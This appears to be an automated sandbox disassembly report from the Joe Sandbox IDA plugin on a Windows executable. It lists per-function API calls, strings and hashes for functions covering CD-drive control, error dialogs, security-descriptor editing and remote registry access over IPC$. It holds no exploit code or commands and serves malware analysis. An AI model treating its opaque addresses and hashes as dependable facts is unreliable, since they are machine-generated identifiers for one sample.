GetDriveTypeW.KERNEL32 ref: 0067D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0067D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0067D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0067D38C

Strings

open, xrefs: 0067D2B9
set cd door , xrefs: 0067D32D
wait, xrefs: 0067D349
close, xrefs: 0067D298
closed, xrefs: 0067D2A6, 0067D2AF
open , xrefs: 0067D2EE
type cdaudio alias cd wait, xrefs: 0067D30A
close cd wait, xrefs: 0067D377

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 7eaaadbea0714e0c3c8bf65b2e5892e7f84671dd62c5564760c8c6e1de7b12e5
Instruction ID: 93c42261d9248f6d8581a1fe941366004662b58da80c6f123728dee3f6c57270
Opcode Fuzzy Hash: 7eaaadbea0714e0c3c8bf65b2e5892e7f84671dd62c5564760c8c6e1de7b12e5
Instruction Fuzzy Hash: B2516B71504305AFC740EF14C8819AAB7F6FF98718F10896DF89A67291DB31EE06CB96

Function 006726BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,006A3973,00000016,0000138C,00000016,?,00000016,006CDDB4,00000000,?), ref: 006726F1
LoadStringW.USER32(00000000,?,006A3973,00000016), ref: 006726FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,006A3973,00000016,0000138C,00000016,?,00000016,006CDDB4,00000000,?,00000016), ref: 0067271C
LoadStringW.USER32(00000000,?,006A3973,00000016), ref: 0067271F
__swprintf.LIBCMT ref: 0067276F
__swprintf.LIBCMT ref: 00672780
_wprintf.LIBCMT ref: 00672829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00672840

Strings

Line %d:, xrefs: 0067277A
Line %d (File "%s"):, xrefs: 00672769
^ ERROR, xrefs: 006727D5
%s (%d) : ==> %s: %s %s, xrefs: 00672824
Error: , xrefs: 006727F7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: ecebb28299b3eaf99b88a97d558d58d68e2d592b5ff0973ab48c7e9dffed51b1
Instruction ID: c395f761a02c6ecf9153b7f52bbbb3bc8af1ba73b23d94e4aafd0b97aab52714
Opcode Fuzzy Hash: ecebb28299b3eaf99b88a97d558d58d68e2d592b5ff0973ab48c7e9dffed51b1
Instruction Fuzzy Hash: A3414F72800219BBCB54FBE0DD96EEEB77AAF15340F100069B50677092EA316F59CBA5

Function 0067D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0067D0D8
__swprintf.LIBCMT ref: 0067D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0067D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0067D15C
_memset.LIBCMT ref: 0067D17B
_wcsncpy.LIBCMT ref: 0067D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0067D1EC
CloseHandle.KERNEL32(00000000), ref: 0067D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0067D200
CloseHandle.KERNEL32(00000000), ref: 0067D20A

Strings

:, xrefs: 0067D11B
\??\%s, xrefs: 0067D0F4
\, xrefs: 0067D110

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 75a46ac105d45ba17933800ef68cd3d17baa814bf4a5b311da09161aaff1e35e
Instruction ID: c06843af307c1e431022866ede247b01f9e09e4ddc594e3a3e35aa7a15106f94
Opcode Fuzzy Hash: 75a46ac105d45ba17933800ef68cd3d17baa814bf4a5b311da09161aaff1e35e
Instruction Fuzzy Hash: 9631B3B6500109ABDB20DFA4CC49FEB37BEEF89741F1081BAF619D6161E77097858B24

Function 0069E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0069BEF4,?,?), ref: 0069E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0069BEF4,?,?,00000000,?), ref: 0069E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0069BEF4,?,?,00000000,?), ref: 0069E776
CloseHandle.KERNEL32(00000000,?,?,?,?,0069BEF4,?,?,00000000,?), ref: 0069E783
GlobalLock.KERNEL32(00000000), ref: 0069E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0069BEF4,?,?,00000000,?), ref: 0069E79B
GlobalUnlock.KERNEL32(00000000), ref: 0069E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,0069BEF4,?,?,00000000,?), ref: 0069E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0069BEF4,?,?,00000000,?), ref: 0069E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,006BD9BC,?), ref: 0069E7D5
GlobalFree.KERNEL32(00000000), ref: 0069E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 0069E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0069E834
DeleteObject.GDI32(00000000), ref: 0069E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0069E872

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 1fd5b5f8b6163b59ce469821ab44898e72561db12dee87e7087c6f7644d52b71
Instruction ID: 53bd943882875dc3f0153415b08cf7126d6797492b6b86921dfb6a270e84ea80
Opcode Fuzzy Hash: 1fd5b5f8b6163b59ce469821ab44898e72561db12dee87e7087c6f7644d52b71
Instruction Fuzzy Hash: 71412BB5600204FFDB11DFA5DC48EAA7BBEEF89B15F104168F905DB260E7319981DB21

Function 006805F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0068076F
_wcscat.LIBCMT ref: 00680787
_wcscat.LIBCMT ref: 00680799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006807AE
SetCurrentDirectoryW.KERNEL32(?), ref: 006807C2
GetFileAttributesW.KERNEL32(?), ref: 006807DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 006807F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00680806

Strings

*.*, xrefs: 00680845

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 66e901e0f2f417d526e17dbd6bb6e83be9a9f7a86ed6c78e865883db15b9d6f8
Instruction ID: 800029a46f7b2fee2f2c304b477d7176af98232202381b10cf31690bdd377e86
Opcode Fuzzy Hash: 66e901e0f2f417d526e17dbd6bb6e83be9a9f7a86ed6c78e865883db15b9d6f8
Instruction Fuzzy Hash: 658184B15043019FEBA4EF24C8459AEB3EABF85314F144E2EF885D7351E730D9998B92

Function 0069EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0064B34E: GetWindowLongW.USER32(?,000000EB), ref: 0064B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0069EF3B
GetFocus.USER32 ref: 0069EF4B
GetDlgCtrlID.USER32(00000000), ref: 0069EF56
_memset.LIBCMT ref: 0069F081
GetMenuItemInfoW.USER32 ref: 0069F0AC
GetMenuItemCount.USER32(00000000), ref: 0069F0CC
GetMenuItemID.USER32(?,00000000), ref: 0069F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0069F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0069F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0069F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0069F1C8

Strings

0, xrefs: 0069F079

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0e58c9e4636891b80126294922499dded7df8143927484b45964c77e9581487a
Instruction ID: dc399ac09703f229249f10a417b9c1b02942f0e1c5781b8ddd48b85c43cfb3ae
Opcode Fuzzy Hash: 0e58c9e4636891b80126294922499dded7df8143927484b45964c77e9581487a
Instruction Fuzzy Hash: 16818B71508301EFDB20CF15C884AABBBEAFB88314F11492EF998D7691D771D945CBA2

Function 0066A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0066ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0066ABD7
Part of subcall function 0066ABBB: GetLastError.KERNEL32(?,0066A69F,?,?,?), ref: 0066ABE1
Part of subcall function 0066ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0066A69F,?,?,?), ref: 0066ABF0
Part of subcall function 0066ABBB: HeapAlloc.KERNEL32(00000000,?,0066A69F,?,?,?), ref: 0066ABF7
Part of subcall function 0066ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0066AC0E

Part of subcall function 0066AC56: GetProcessHeap.KERNEL32(00000008,0066A6B5,00000000,00000000,?,0066A6B5,?), ref: 0066AC62
Part of subcall function 0066AC56: HeapAlloc.KERNEL32(00000000,?,0066A6B5,?), ref: 0066AC69
Part of subcall function 0066AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0066A6B5,?), ref: 0066AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0066A8CB
_memset.LIBCMT ref: 0066A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0066A8FF
GetLengthSid.ADVAPI32(?), ref: 0066A910
GetAce.ADVAPI32(?,00000000,?), ref: 0066A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0066A969
GetLengthSid.ADVAPI32(?), ref: 0066A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0066A995
HeapAlloc.KERNEL32(00000000), ref: 0066A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0066A9BD
CopySid.ADVAPI32(00000000), ref: 0066A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0066A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0066AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0066AA2F

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: db09148769662a1300b139da38ca5fcc867b0c6eb143d95d0542d7c24c24fad5
Instruction ID: 37d8e5c0364f5f5fc70e63117ae468fec4dfb14f7072106743bd45fe2006cae9
Opcode Fuzzy Hash: db09148769662a1300b139da38ca5fcc867b0c6eb143d95d0542d7c24c24fad5
Instruction Fuzzy Hash: CB513DB1900109AFDF10DFD4DD85AEEBB7AFF04300F14821AE915EA291E7359945CF61

Function 00689DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00689E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00689E42
CreateCompatibleDC.GDI32(?), ref: 00689E4E
SelectObject.GDI32(00000000,?), ref: 00689E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00689EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00689EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00689F0F
SelectObject.GDI32(00000006,?), ref: 00689F17
DeleteObject.GDI32(?), ref: 00689F20
DeleteDC.GDI32(00000006), ref: 00689F27
ReleaseDC.USER32(00000000,?), ref: 00689F32

Strings

(, xrefs: 00689ED7

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: c49a54a7363fe3da929cd322ae8daf6d1f4bd6a2dbcbfa3d890869dbf433e27e
Instruction ID: a16262898afff5e8145d24dc36db16b1f0fdf95511adfcd97ab3326c0420c36a
Opcode Fuzzy Hash: c49a54a7363fe3da929cd322ae8daf6d1f4bd6a2dbcbfa3d890869dbf433e27e
Instruction Fuzzy Hash: 19514BB5900309EFCB14DFA8CC89EAEBBBAEF48310F14851DF959A7250D731A941CB60

Function 0067CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0067CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0067CCC5
__swprintf.LIBCMT ref: 0067CD1E
__swprintf.LIBCMT ref: 0067CD37
_wprintf.LIBCMT ref: 0067CDED
_wprintf.LIBCMT ref: 0067CE0B

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0067CDE8
Line %d (File "%s"):, xrefs: 0067CD18, 0067CD31
^ ERROR, xrefs: 0067CD8F
"%s" (%d) : ==> %s:, xrefs: 0067CE06
Error: , xrefs: 0067CDB5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 649e4036777fb97fd5677c0a3459263306b8d2933df6572df1c7c49adaff9605
Instruction ID: 130b1fed4adf0756f66ddb4d94fd4b4d4afc60119dc38bb35d47c7579eb57ccd
Opcode Fuzzy Hash: 649e4036777fb97fd5677c0a3459263306b8d2933df6572df1c7c49adaff9605
Instruction Fuzzy Hash: 51518B31800209BBCB54EBA0CD46EEEB77AAF09350F104169F506771A2EB316F59DFA5

Function 0067CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0067CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0067CAB0
__swprintf.LIBCMT ref: 0067CB09
__swprintf.LIBCMT ref: 0067CB22
_wprintf.LIBCMT ref: 0067CBCD
_wprintf.LIBCMT ref: 0067CBEB

Strings

^ ERROR , xrefs: 0067CB64
"%s" (%d) : ==> %s:%s%s, xrefs: 0067CBC8
Line %d (File "%s"):, xrefs: 0067CB03, 0067CB1C
"%s" (%d) : ==> %s:, xrefs: 0067CBE6
Error: , xrefs: 0067CB95

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 4d769e61e24ba5724ac2d53f63c993d2b7b82c7d7e8beb11c86fa7f0ecbaefbf
Instruction ID: 45b5f41174280de3a82f55cf1ce4b25aeceec05da33e992a67b9d2b63cd6dcbd
Opcode Fuzzy Hash: 4d769e61e24ba5724ac2d53f63c993d2b7b82c7d7e8beb11c86fa7f0ecbaefbf
Instruction Fuzzy Hash: 88519D31800209ABCB15EBE0CD46EEEB77AAF04350F104069B50A771A2EB306F59DFA5

Function 00693C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00692BB5,?,?), ref: 00693C1D

Strings

HKU, xrefs: 00693D15
HKCU, xrefs: 00693CF3
HKEY_USERS, xrefs: 00693D04
HKEY_LOCAL_MACHINE, xrefs: 00693C6C
HKEY_CLASSES_ROOT, xrefs: 00693C96
HKLM, xrefs: 00693C81
HKEY_CURRENT_USER, xrefs: 00693CE2
HKEY_CURRENT_CONFIG, xrefs: 00693CC0
HKCC, xrefs: 00693CD1
$En, xrefs: 00693C36
HKCR, xrefs: 00693CAB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharUpper
String ID: $En$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-3085504136
Opcode ID: beec33041057dfe8f2c905dd5bec949fbb65c71c6852cd0d4322128925cd5372
Instruction ID: fac446d71d722c9daf0da0332db9fb3a308a1cd6305770a0729bb4539311ef3c
Opcode Fuzzy Hash: beec33041057dfe8f2c905dd5bec949fbb65c71c6852cd0d4322128925cd5372
Instruction Fuzzy Hash: EF41403051039A8BDF40EF11D8A1AEA376BFF22344F105458FC655B796EB719E0ACB54

Function 006755BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006755D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00675664
GetMenuItemCount.USER32(006F1708), ref: 006756ED
DeleteMenu.USER32(006F1708,00000005,00000000,000000F5,?,?), ref: 0067577D
DeleteMenu.USER32(006F1708,00000004,00000000), ref: 00675785
DeleteMenu.USER32(006F1708,00000006,00000000), ref: 0067578D
DeleteMenu.USER32(006F1708,00000003,00000000), ref: 00675795
GetMenuItemCount.USER32(006F1708), ref: 0067579D
SetMenuItemInfoW.USER32(006F1708,00000004,00000000,00000030), ref: 006757D3
GetCursorPos.USER32(?), ref: 006757DD
SetForegroundWindow.USER32(00000000), ref: 006757E6
TrackPopupMenuEx.USER32(006F1708,00000000,?,00000000,00000000,00000000), ref: 006757F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00675805

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: bd1c9d72f26139b3ecbbd7b53379e5857e61001974cf5cdf706c8230e464c2c9
Instruction ID: 3f92057b7c4fcd8981b53809911c1f38a30cf61c623d68ea2a8414081bb0b9dd
Opcode Fuzzy Hash: bd1c9d72f26139b3ecbbd7b53379e5857e61001974cf5cdf706c8230e464c2c9
Instruction Fuzzy Hash: EB71F270640615BEEB209B14CC49FEABF67FF00364F248259F51E6A2E0CBB16C50DBA4

Function 0066A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0066A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0066A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0066A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0066A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0066A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0066A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0066A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0066A2AB

Strings

\CLSID, xrefs: 0066A193
\IPC$, xrefs: 0066A1F3
SOFTWARE\Classes\, xrefs: 0066A17D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: b7fe3f5fe255b720847a36e427b46885690c94e8e6e8582f67e14aa538bc514a
Instruction ID: 7444c715e2ab9aafdc0058992603ffec94dcca7e59d73e1c260384cfdfa552cf
